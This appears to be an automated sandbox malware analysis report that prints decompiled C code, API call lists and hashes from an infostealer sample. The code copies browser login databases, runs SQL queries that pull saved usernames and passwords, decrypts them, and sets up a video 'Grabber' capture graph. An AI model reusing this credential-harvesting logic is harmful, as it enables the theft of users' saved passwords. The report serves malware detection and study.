                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 02D1C14E
                                                                    • thunderbird.exe, xrefs: 02D1C15A
                                                                    • Path, xrefs: 02D1C190
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                                    • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                                    • API String ID: 3135247354-1374996286
                                                                    • Opcode ID: 9fdacd3be9335e99ab375e1e4e0820ec5630eba3abdb3fda53d2cb159c67adde
                                                                    • Instruction ID: f6a97edc31f2d9122fdedbf44060516b84ae4352420fc727a153506076afd94e
                                                                    • Opcode Fuzzy Hash: 9fdacd3be9335e99ab375e1e4e0820ec5630eba3abdb3fda53d2cb159c67adde
                                                                    • Instruction Fuzzy Hash: 051112B2D8011CBFE710AAA4ED49FDA777CEB64305F100465BA05E2240E6709E588B61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404730 Relevance: 13.8, APIs: 9, Instructions: 331COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlEnterCriticalSection.NTDLL(0054BF90), ref: 0040478B
                                                                    • GetModuleFileNameA.KERNEL32(?,00000104), ref: 00404816
                                                                    • __alloca_probe_16.LIBCMT ref: 0040488D
                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,?,?), ref: 004048C7
                                                                    • LoadTypeLib.OLEAUT32(?,00000000), ref: 004048DE
                                                                    • RtlEnterCriticalSection.NTDLL(0054BFAC), ref: 00404ADF
                                                                    • RtlLeaveCriticalSection.NTDLL(0054BFAC), ref: 00404AF5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$Enter$ByteCharFileLeaveLoadModuleMultiNameTypeWide__alloca_probe_16
                                                                    • String ID:
                                                                    • API String ID: 554975853-0
                                                                    • Opcode ID: c2c0ac5533a874e479ebd785b81e21b65538b429b7ccc11221118e51253b8220
                                                                    • Instruction ID: d58f747a6a25426e7dd0b31ff1eeea421ba2af15bbe7e5e59a307e65b5ba61fe
                                                                    • Opcode Fuzzy Hash: c2c0ac5533a874e479ebd785b81e21b65538b429b7ccc11221118e51253b8220
                                                                    • Instruction Fuzzy Hash: 64D198B59002189FDB24DF64CC44BEAB7B5AF85314F1480EAEA09A7390D734EE85CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1C4A8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E02D1C4A8(intOrPtr __ecx, void* __eflags, char _a4, signed int _a8, char _a12, char _a16, intOrPtr _a20) {
				WCHAR* _v12;
				char _v16;
				WCHAR* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				char _v84;
				char _v88;
				int _t148;
				intOrPtr* _t160;
				void* _t161;
				char _t165;
				char _t177;
				char _t178;
				char _t188;
				char* _t189;
				char* _t190;
				char* _t191;
				void* _t192;
				void* _t194;
				char _t198;
				char _t223;
				intOrPtr _t233;
				char* _t251;
				char* _t255;
				void* _t322;
				void* _t323;
				void* _t324;
				void* _t325;
				void* _t326;
				void* _t327;
				char _t331;
				WCHAR* _t337;
				intOrPtr _t338;
				void* _t339;
				void* _t340;

				_t343 = __eflags;
				_v24 = _v24 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_t233 = __ecx;
				_t322 = 0x1a;
				_v52 = __ecx;
				E02D1F76B( &_v12, _t322, __eflags);
				_t329 = "\\";
				E02D1346A( &_v12, _t322, __eflags, "\\");
				_t323 = 8;
				E02D13335( &_v12, _t343, E02D134A7( &_v48, _t323, _t343));
				E02D15EA5(_v48);
				_t336 = L".tmp";
				E02D1346A( &_v12, _t323, _t343, L".tmp");
				_t324 = 0x1a;
				E02D1F76B( &_v20, _t324, _t343);
				E02D1346A( &_v20, _t324, _t343, _t329);
				_t325 = 8;
				E02D13335( &_v20, _t343, E02D134A7( &_v48, _t325, _t343));
				E02D15EA5(_v48);
				E02D1346A( &_v20, _t325, _t343, _t336);
				_t344 = _a12;
				_t251 =  &_v48;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t326);
				E02D13437( &_v24, E02D1F76B(_t251, _t326, _t344));
				E02D15EA5(_v48);
				E02D1346A( &_v24, _t326, _t344, _a4);
				_t345 = _a12;
				_t255 =  &_a12;
				if(_a12 == 0) {
					_push(0x1c);
				} else {
					_push(0x1a);
				}
				_pop(_t327);
				E02D13437( &_v28, E02D1F76B(_t255, _t327, _t345));
				E02D15EA5(_a12);
				E02D1346A( &_v28, _t327, _t345, _a8);
				_t148 = PathFileExistsW(_v24);
				_t337 = _v28;
				if(_t148 == 0 || PathFileExistsW(_t337) == 0 || CopyFileW(_v24, _v12, 0) == 0 || CopyFileW(_t337, _v20, 0) == 0) {
					L12:
					_t331 = 0;
					goto L13;
				} else {
					E02D13437( &_v24,  &_v12);
					_t160 = E02D13554( &_v24,  &_a12);
					_t161 =  *((intOrPtr*)(_t233 + 0x30))( *_t160,  &_v56);
					_t268 = _a12;
					E02D15EA5(_a12);
					if(_t161 == 0) {
						_v32 = _v32 & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t165 = E02D1CED9(_t268, _t268,  &_v32,  &_a8);
						_t340 = _t339 + 0x10;
						_t331 = 1;
						__eflags = _t165;
						if(_t165 == 0) {
							L36:
							 *((intOrPtr*)(_t233 + 0x60))();
							 *((intOrPtr*)(_t233 + 0x34))();
							E02D1362D(_t340,  &_v12);
							E02D1FF0B(_v56);
							E02D1362D(_t340,  &_v20);
							E02D1FF0B(_v16);
							L13:
							E02D15EA5(_v20);
							E02D15EA5(_v12);
							E02D15EA5(_t337);
							E02D15EA5(_v24);
							return _t331;
						}
						__eflags = _a16;
						_t176 =  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins";
						_t177 =  *((intOrPtr*)(_t233 + 0x38))(_v56,  !=  ? "select signon_realm, origin_url, username_value, password_value from wow_logins" : "select signon_realm, origin_url, username_value, password_value from logins", 0xffffffff,  &_v16, 0);
						_t340 = _t340 + 0x14;
						__eflags = _t177;
						if(_t177 != 0) {
							goto L36;
						}
						_t178 =  *((intOrPtr*)(_t233 + 0x44))(_v16);
						_pop(_t268);
						__eflags = _t178 - 0x64;
						if(_t178 != 0x64) {
							L35:
							__eflags = _t178;
							if(_t178 != 0) {
								goto L11;
							}
							goto L36;
						}
						_t338 = _t233;
						do {
							_a16 = E02D15E22(_t331);
							_t335 = E02D15E22(_t331);
							_a4 = _t186;
							_v48 = E02D15E22(1);
							_t188 = E02D15E22(1);
							_a12 = _t188;
							_t189 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 0);
							__eflags =  *_t189;
							if( *_t189 != 0) {
								E02D13125( &_a4, E02D133BF( &_v60, _t189));
								E02D15EA5(_v60);
								_t335 = _a4;
							}
							_t190 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 1);
							__eflags =  *_t190;
							if( *_t190 != 0) {
								E02D13125( &_v48, E02D133BF( &_v64, _t190));
								E02D15EA5(_v64);
							}
							_t191 =  *((intOrPtr*)(_t338 + 0x40))(_v16, 2);
							__eflags =  *_t191;
							if( *_t191 != 0) {
								E02D13125( &_a12, E02D133BF( &_v68, _t191));
								E02D15EA5(_v68);
							}
							_t192 =  *((intOrPtr*)(_t338 + 0x5c))(_v16, 3, _v32, _a8);
							_t194 = E02D1CF58( *((intOrPtr*)(_t338 + 0x54))(), _t192, _v16, 3);
							_t340 = _t340 - 0xc + 0x24;
							E02D13125( &_a16, E02D133BF( &_v72, _t194));
							E02D15EA5(_v72);
							_t198 = E02D1308C( &_a12);
							__eflags = _t198;
							if(_t198 > 0) {
								L26:
								_v88 = 0;
								_v84 = 0;
								_v80 = 0;
								__eflags = E02D1308C( &_a4);
								if(__eflags > 0) {
									E02D13437( &_v88, E02D1309D( &_a4, __eflags,  &_v36));
									E02D15EA5(_v36);
									_v36 = 0;
								}
								__eflags = E02D1308C( &_a12);
								if(__eflags > 0) {
									E02D13437( &_v84, E02D1309D( &_a12, __eflags,  &_v40));
									E02D15EA5(_v40);
									_v40 = 0;
								}
								__eflags = E02D1308C( &_a16);
								if(__eflags != 0) {
									E02D13437( &_v80, E02D1309D( &_a16, __eflags,  &_v44));
									E02D15EA5(_v44);
									_v44 = 0;
								}
								_t340 = _t340 - 0x10;
								_v76 = _a20;
								E02D11F95(_t340,  &_v88);
								E02D11FCB(_t338);
								E02D113EF( &_v88);
							} else {
								_t223 = E02D1308C( &_a16);
								__eflags = _t223;
								if(_t223 <= 0) {
									goto L33;
								}
								goto L26;
							}
							L33:
							E02D15EA5(_a12);
							E02D15EA5(_v48);
							E02D15EA5(_t335);
							E02D15EA5(_a16);
							_t178 =  *((intOrPtr*)(_t338 + 0x44))(_v16);
							_pop(_t268);
							_t331 = 1;
							__eflags = _t178 - 0x64;
						} while (_t178 == 0x64);
						_t337 = _v28;
						_t233 = _v52;
						goto L35;
					}
					L11:
					E02D1362D(_t340,  &_v12);
					E02D1FF0B(_t268);
					E02D1362D(_t340,  &_v20);
					E02D1FF0B();
					goto L12;
				}
			}



















































                                                                    0x02d1c4a8
                                                                    0x02d1c4ae
                                                                    0x02d1c4b2
                                                                    0x02d1c4b9
                                                                    0x02d1c4c0
                                                                    0x02d1c4c1
                                                                    0x02d1c4c4
                                                                    0x02d1c4c9
                                                                    0x02d1c4d2
                                                                    0x02d1c4d9
                                                                    0x02d1c4e6
                                                                    0x02d1c4ee
                                                                    0x02d1c4f3
                                                                    0x02d1c4fc
                                                                    0x02d1c503
                                                                    0x02d1c507
                                                                    0x02d1c510
                                                                    0x02d1c517
                                                                    0x02d1c524
                                                                    0x02d1c52c
                                                                    0x02d1c535
                                                                    0x02d1c53a
                                                                    0x02d1c53e
                                                                    0x02d1c541
                                                                    0x02d1c547
                                                                    0x02d1c543
                                                                    0x02d1c543
                                                                    0x02d1c543
                                                                    0x02d1c549
                                                                    0x02d1c553
                                                                    0x02d1c55b
                                                                    0x02d1c566
                                                                    0x02d1c56b
                                                                    0x02d1c56f
                                                                    0x02d1c572
                                                                    0x02d1c578
                                                                    0x02d1c574
                                                                    0x02d1c574
                                                                    0x02d1c574
                                                                    0x02d1c57a
                                                                    0x02d1c584
                                                                    0x02d1c58c
                                                                    0x02d1c597
                                                                    0x02d1c5a5
                                                                    0x02d1c5a7
                                                                    0x02d1c5ac
                                                                    0x02d1c628
                                                                    0x02d1c628
                                                                    0x00000000
                                                                    0x02d1c5d5
                                                                    0x02d1c5dc
                                                                    0x02d1c5e8
                                                                    0x02d1c5f3
                                                                    0x02d1c5f8
                                                                    0x02d1c5fd
                                                                    0x02d1c604
                                                                    0x02d1c652
                                                                    0x02d1c659
                                                                    0x02d1c666
                                                                    0x02d1c66d
                                                                    0x02d1c670
                                                                    0x02d1c671
                                                                    0x02d1c673
                                                                    0x02d1c8b2
                                                                    0x02d1c8b5
                                                                    0x02d1c8bc
                                                                    0x02d1c8c5
                                                                    0x02d1c8ca
                                                                    0x02d1c8d5
                                                                    0x02d1c8da
                                                                    0x02d1c62a
                                                                    0x02d1c62d
                                                                    0x02d1c635
                                                                    0x02d1c63c
                                                                    0x02d1c644
                                                                    0x02d1c64f
                                                                    0x02d1c64f
                                                                    0x02d1c679
                                                                    0x02d1c68f
                                                                    0x02d1c696
                                                                    0x02d1c699
                                                                    0x02d1c69c
                                                                    0x02d1c69e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1c6a7
                                                                    0x02d1c6aa
                                                                    0x02d1c6ab
                                                                    0x02d1c6ae
                                                                    0x02d1c8aa
                                                                    0x02d1c8aa
                                                                    0x02d1c8ac
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1c8ac
                                                                    0x02d1c6b4
                                                                    0x02d1c6b6
                                                                    0x02d1c6bf
                                                                    0x02d1c6c9
                                                                    0x02d1c6cc
                                                                    0x02d1c6d8
                                                                    0x02d1c6db
                                                                    0x02d1c6e5
                                                                    0x02d1c6e8
                                                                    0x02d1c6ed
                                                                    0x02d1c6f0
                                                                    0x02d1c6ff
                                                                    0x02d1c707
                                                                    0x02d1c70c
                                                                    0x02d1c70c
                                                                    0x02d1c713
                                                                    0x02d1c718
                                                                    0x02d1c71b
                                                                    0x02d1c72a
                                                                    0x02d1c732
                                                                    0x02d1c732
                                                                    0x02d1c73c
                                                                    0x02d1c741
                                                                    0x02d1c744
                                                                    0x02d1c753
                                                                    0x02d1c75b
                                                                    0x02d1c75b
                                                                    0x02d1c76e
                                                                    0x02d1c782
                                                                    0x02d1c787
                                                                    0x02d1c797
                                                                    0x02d1c79f
                                                                    0x02d1c7a7
                                                                    0x02d1c7ac
                                                                    0x02d1c7ae
                                                                    0x02d1c7c0
                                                                    0x02d1c7c5
                                                                    0x02d1c7c8
                                                                    0x02d1c7cb
                                                                    0x02d1c7d3
                                                                    0x02d1c7d5
                                                                    0x02d1c7e7
                                                                    0x02d1c7ef
                                                                    0x02d1c7f4
                                                                    0x02d1c7f4
                                                                    0x02d1c7ff
                                                                    0x02d1c801
                                                                    0x02d1c813
                                                                    0x02d1c81b
                                                                    0x02d1c820
                                                                    0x02d1c820
                                                                    0x02d1c82b
                                                                    0x02d1c82d
                                                                    0x02d1c83f
                                                                    0x02d1c847
                                                                    0x02d1c84c
                                                                    0x02d1c84c
                                                                    0x02d1c852
                                                                    0x02d1c855
                                                                    0x02d1c85e
                                                                    0x02d1c865
                                                                    0x02d1c86d
                                                                    0x02d1c7b0
                                                                    0x02d1c7b3
                                                                    0x02d1c7b8
                                                                    0x02d1c7ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1c7ba
                                                                    0x02d1c872
                                                                    0x02d1c875
                                                                    0x02d1c87d
                                                                    0x02d1c884
                                                                    0x02d1c88c
                                                                    0x02d1c894
                                                                    0x02d1c897
                                                                    0x02d1c89a
                                                                    0x02d1c89b
                                                                    0x02d1c89b
                                                                    0x02d1c8a4
                                                                    0x02d1c8a7
                                                                    0x00000000
                                                                    0x02d1c8a7
                                                                    0x02d1c606
                                                                    0x02d1c60d
                                                                    0x02d1c612
                                                                    0x02d1c61d
                                                                    0x02d1c622
                                                                    0x00000000
                                                                    0x02d1c627

                                                                    APIs
                                                                      • Part of subcall function 02D1F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 02D1F79C
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    • PathFileExistsW.SHLWAPI(00000000,?,00000000,00000000,00000000,.tmp,00000000,02D24684,.tmp,00000000,02D24684,?,00000000), ref: 02D1C5A5
                                                                    • PathFileExistsW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,02D1C245), ref: 02D1C5AF
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D1C5C3
                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D1C5CF
                                                                      • Part of subcall function 02D1CED9: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02D1C66B,?,?,00000000,?), ref: 02D1CF43
                                                                      • Part of subcall function 02D1CED9: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,02D1C66B,?,?,00000000,?), ref: 02D1CF4C
                                                                      • Part of subcall function 02D1CF58: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 02D1CFE0
                                                                      • Part of subcall function 02D1CF58: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 02D1D00E
                                                                      • Part of subcall function 02D1CF58: LocalFree.KERNEL32(?), ref: 02D1D096
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,745D0770,?,02D15A4F,.bss,00000000), ref: 02D133C8
                                                                      • Part of subcall function 02D133BF: lstrlenA.KERNEL32(?,?,02D15A4F,.bss,00000000), ref: 02D133D5
                                                                      • Part of subcall function 02D133BF: lstrcpyA.KERNEL32(00000000,?,?,02D15A4F,.bss,00000000), ref: 02D133E8
                                                                      • Part of subcall function 02D13125: lstrcatA.KERNEL32(00000000,745D0770,?,00000000,?,02D135C4,00000000,00000000,?,02D14E98,?,?,?,?,?,00000000), ref: 02D13151
                                                                      • Part of subcall function 02D1308C: lstrlenA.KERNEL32(00000000,02D130B4,745D0770,00000000,00000000,?,02D132DC,02D1350E,00000000,-00000001,745D0770,?,02D1350E,00000000,?,00000000), ref: 02D13093
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                                    • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                                    • API String ID: 881303001-3832748974
                                                                    • Opcode ID: 4409f010c47582863ec2c2bde45f9d159ddb63d45be6c67783075c699693e157
                                                                    • Instruction ID: 0dbed1cda6a8fcc83146f5a56f02a4f94e9b794cc492f782baaf86fbc767c700
                                                                    • Opcode Fuzzy Hash: 4409f010c47582863ec2c2bde45f9d159ddb63d45be6c67783075c699693e157
                                                                    • Instruction Fuzzy Hash: 7CD13D71D10209BBDF15EFA4EC91AEEB77AEF54300F54406AE412A6690DF359E04CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004097C5 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 004098E4
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 004099F2
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00409B44
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00409B5F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2751267872-393685449
                                                                    • Opcode ID: cc91ace58337b72701b50270f3e2967c555d85595d705a01769e77637ad3365b
                                                                    • Instruction ID: d3875208064eb098c4efa27100056e69cfd514645d62d1e8bcbaf91445c364f9
                                                                    • Opcode Fuzzy Hash: cc91ace58337b72701b50270f3e2967c555d85595d705a01769e77637ad3365b
                                                                    • Instruction Fuzzy Hash: 71B15571900209AFCF18EFA5D8819AFBBB5BF44314B14416AE8117B392C739EE51CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D2273A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 175comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E02D2273A(intOrPtr __ecx, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v58;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v128;
				char _v144;
				intOrPtr _v148;
				char _v216;
				intOrPtr* _t63;
				intOrPtr* _t76;
				intOrPtr* _t80;
				signed int _t82;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t92;
				intOrPtr* _t93;
				intOrPtr* _t94;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t98;
				signed int _t103;
				intOrPtr* _t115;
				intOrPtr* _t118;
				void* _t121;

				_v28 = __ecx;
				__imp__CoInitialize(0);
				_v12 = 0;
				_v16 = 0;
				_t118 = 0;
				_v20 = 0;
				_t89 = 0;
				_v24 = 0;
				_t115 = __imp__CoCreateInstance;
				_t63 =  *_t115(0x2d245a0, 0, 1, 0x2d27410,  &_v24);
				_t91 = _v24;
				if(_t91 == 0) {
					L8:
					_t92 = _v12;
					if(_t92 != 0) {
						_t63 =  *((intOrPtr*)( *_t92 + 8))(_t92);
						_v12 = _v12 & 0x00000000;
					}
					L10:
					_t93 = _v16;
					if(_t93 != 0) {
						_t63 =  *((intOrPtr*)( *_t93 + 8))(_t93);
						_v16 = _v16 & 0x00000000;
					}
					_t94 = _v20;
					if(_t94 != 0) {
						_t63 =  *((intOrPtr*)( *_t94 + 8))(_t94);
						_v20 = _v20 & 0x00000000;
					}
					_t95 = _v24;
					if(_t95 != 0) {
						_t63 =  *((intOrPtr*)( *_t95 + 8))(_t95);
						_v24 = _v24 & 0x00000000;
					}
					if(_t118 != 0) {
						_t63 =  *((intOrPtr*)( *_t118 + 8))(_t118);
					}
					if(_t89 != 0) {
						_t63 =  *((intOrPtr*)( *_t89 + 8))(_t89);
					}
					__imp__CoUninitialize();
					return _t63;
				}
				_t63 =  *((intOrPtr*)( *_t91))(_t91, 0x2d24580,  &_v16);
				_t96 = _v16;
				if(_t96 == 0) {
					goto L8;
				}
				 *((intOrPtr*)( *_t96 + 4))(_t96);
				_t63 = E02D22A6B(_a4,  &_v12);
				if(_v12 == 0) {
					goto L10;
				}
				_t63 =  *_t115(0x2d245f0, 0, 1, 0x2d27400,  &_v20);
				_t98 = _v20;
				if(_t98 != 0) {
					 *((intOrPtr*)( *_t98 + 0xc))(_t98, _v12, L"Source");
					_t76 = _v20;
					 *((intOrPtr*)( *_t76 + 0xc))(_t76, _v16, L"Grabber");
					E02D11052( &_v144, 0, 0x48);
					_t80 = _v24;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_t80 + 0x10))(_t80,  &_v144);
					_t63 = E02D22688();
					_t118 = _t63;
					if(_t118 != 0) {
						_t63 = E02D226A4();
						_t89 = _t63;
						if(_t89 != 0) {
							_t103 = _v20;
							_t63 =  *((intOrPtr*)( *_t103 + 0x2c))(_t103, _t118, _t89);
							if(_t63 >= 0) {
								_t82 = _v24;
								 *((intOrPtr*)( *_t82 + 0x14))(_t82,  &_v216);
								_t105 = _v148;
								_t113 = _v148 + 0x30;
								E02D1102C(_t121 + _v148 + 0x30 - _t105 - 0x74, _v148 + 0x30, 0x28);
								E02D224EB( &_v216);
								_t63 = E02D22B2A(_v28, _t113, _a4, _v64, _v68, _v58);
							}
						}
					}
				}
				goto L8;
			}































                                                                    0x02d22748
                                                                    0x02d2274c
                                                                    0x02d22755
                                                                    0x02d22761
                                                                    0x02d22764
                                                                    0x02d22766
                                                                    0x02d22769
                                                                    0x02d2276b
                                                                    0x02d2276e
                                                                    0x02d22779
                                                                    0x02d2277b
                                                                    0x02d22780
                                                                    0x02d228aa
                                                                    0x02d228aa
                                                                    0x02d228af
                                                                    0x02d228b4
                                                                    0x02d228b7
                                                                    0x02d228b7
                                                                    0x02d228bb
                                                                    0x02d228bb
                                                                    0x02d228c0
                                                                    0x02d228c5
                                                                    0x02d228c8
                                                                    0x02d228c8
                                                                    0x02d228cc
                                                                    0x02d228d1
                                                                    0x02d228d6
                                                                    0x02d228d9
                                                                    0x02d228d9
                                                                    0x02d228dd
                                                                    0x02d228e2
                                                                    0x02d228e7
                                                                    0x02d228ea
                                                                    0x02d228ea
                                                                    0x02d228f0
                                                                    0x02d228f5
                                                                    0x02d228f5
                                                                    0x02d228fa
                                                                    0x02d228ff
                                                                    0x02d228ff
                                                                    0x02d22902
                                                                    0x02d2290c
                                                                    0x02d2290c
                                                                    0x02d22792
                                                                    0x02d22794
                                                                    0x02d22799
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d227a2
                                                                    0x02d227ab
                                                                    0x02d227b3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d227ca
                                                                    0x02d227cc
                                                                    0x02d227d1
                                                                    0x02d227e2
                                                                    0x02d227e5
                                                                    0x02d227f3
                                                                    0x02d22800
                                                                    0x02d2280a
                                                                    0x02d2281c
                                                                    0x02d2281f
                                                                    0x02d22820
                                                                    0x02d22821
                                                                    0x02d2282a
                                                                    0x02d2282b
                                                                    0x02d2282c
                                                                    0x02d2282d
                                                                    0x02d22830
                                                                    0x02d22836
                                                                    0x02d2283b
                                                                    0x02d2283f
                                                                    0x02d22844
                                                                    0x02d22849
                                                                    0x02d2284d
                                                                    0x02d2284f
                                                                    0x02d22857
                                                                    0x02d2285c
                                                                    0x02d2285e
                                                                    0x02d2286b
                                                                    0x02d2286e
                                                                    0x02d22876
                                                                    0x02d22883
                                                                    0x02d22891
                                                                    0x02d228a5
                                                                    0x02d228a5
                                                                    0x02d2285c
                                                                    0x02d2284d
                                                                    0x02d2283f
                                                                    0x00000000

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D2274C
                                                                    • CoCreateInstance.OLE32(02D245A0,00000000,00000001,02D27410,02D2227B), ref: 02D22779
                                                                    • CoUninitialize.OLE32 ref: 02D22902
                                                                      • Part of subcall function 02D22A6B: CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,7426B690,00000000,00000000,?,?,02D227B0), ref: 02D22A99
                                                                    • CoCreateInstance.OLE32(02D245F0,00000000,00000001,02D27400,?), ref: 02D227CA
                                                                      • Part of subcall function 02D224EB: CoTaskMemFree.OLE32(?,?,00000000,02D22896), ref: 02D224F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
